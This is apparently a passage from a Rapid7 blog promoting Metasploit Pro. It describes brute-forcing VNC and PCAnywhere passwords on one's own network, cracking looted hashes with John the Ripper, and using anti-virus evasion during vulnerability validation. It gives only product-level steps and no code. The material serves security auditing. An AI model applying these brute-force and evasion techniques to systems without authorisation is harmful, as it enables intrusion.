However, especially in the case of remote access solutions, this approach does not work - you need to test passwords directly against the live service. Metasploit includes auxiliary modules that help you brute force passwords against PC Anywhere and VNC services. Here's how you'd conduct an audit for these services on your network with Metasploit Express or Metasploit Pro:

 

  1. Run a discovery scan on your network, which will identify any VNC or PCAnywhere services listening on the network
  2. Hit the "Bruteforce" button
  3. Select only the services for PCAnywhere and VNC, and start the brute forcing process

 

Bruteforce_vnc_pcanywhere.png

 

Metasploit Pro will now test these services using a list of the most common passwords, which include host names from the discovery scan. You can also provide your own password list, which may include the name of the POS vendors you work with.

 

By the way, Metasploit Pro also comes with a John The Ripper integration that cracks looted password hashes, covering the offline angle as well.

 

If you don't currently use Metasploit Pro, you can download a free Metasploit Pro trial on Rapid7.com. If you're running Kali Linux, Metasploit comes preinstalled. Just fill in the trial form to get the key, enter "msfconsole" on a Kali terminal, type "go_pro" and enter the license key.

When think talk about anti-virus evasion, we mostly do so in the context of a penetration test: If the "bad guys" can evade AV solutions because they write custom payloads, then a penetration tester must do the same to simulate an attack. However, AV evasion is also critical to vulnerability validation. While a full-scale penetration test looks for any way into the network, vulnerability validation surgically examines one vulnerability on a specific host and tests if it is exploitable. Security professionals do vulnerability validation because it enables them to determine if a vulnerability is "real" so they can prioritize it; many also use the validation to demonstrate the security exposure to their peers in IT operations to get quick buy-in to patch or mitigate the risk. Metasploit Pro integrates with Rapid7 Nexpose Enterprise to pull reported vulnerabilities for validation and pushing both validated vulnerabilities and vulnerability exceptions back into Nexpose for reporting and future testing, a process we call "closed-loop" vulnerability management.

 

metasploit-vulnerability-validation-findings.png

 

When you validate a vulnerability, you use the exploit associated to the vulnerability to test if it can be used on the machine. The idea is not only to rule out false positives but also to test if mitigating controls can stop an attack. For example, you may have closed a port on the host, shut down a service, or made adjustments on your firewall to protect the system from an attack. While anti-virus solutions are also considered security controls, they are mostly effective against mass malware attacks, not targeted attacks by a skilled attacker. When validating a vulnerability, you should therefore use anti-virus evasion that mimics these types of attackers to get a realistic picture on whether a certain vulnerability leaves a system open to attacks. If you don't, you may create an exception and accept the risk as mitigated while you're actually still vulnerable to an attack, giving you a false sense of security that could result in a breach.

 

In the recent 4.9 release of Metasploit Pro, we have improved our anti-virus evasion and baked it into all processes that use payloads, including vulnerability validation. That means that simply by leveraging Metasploit Pro for vulnerability validation, you're already using anti-virus evasion to mimic a real-world attacker. AV evasion is not included in of Metasploit Framework, Community or Express, so we recommend that you use Metasploit Pro for vulnerability validations to get clean, realistic results. In fact, the classic Metasploit Framework payloads get flagged by most AV companies because they are readily available as open source, leading to false negatives in your vulnerability validation program.

 

If you don't have a copy of Metasploit Pro but would like to give it a go, simply sign up for the free Metasploit Pro trial from rapid7.com.

Filter Blog

By date: By tag: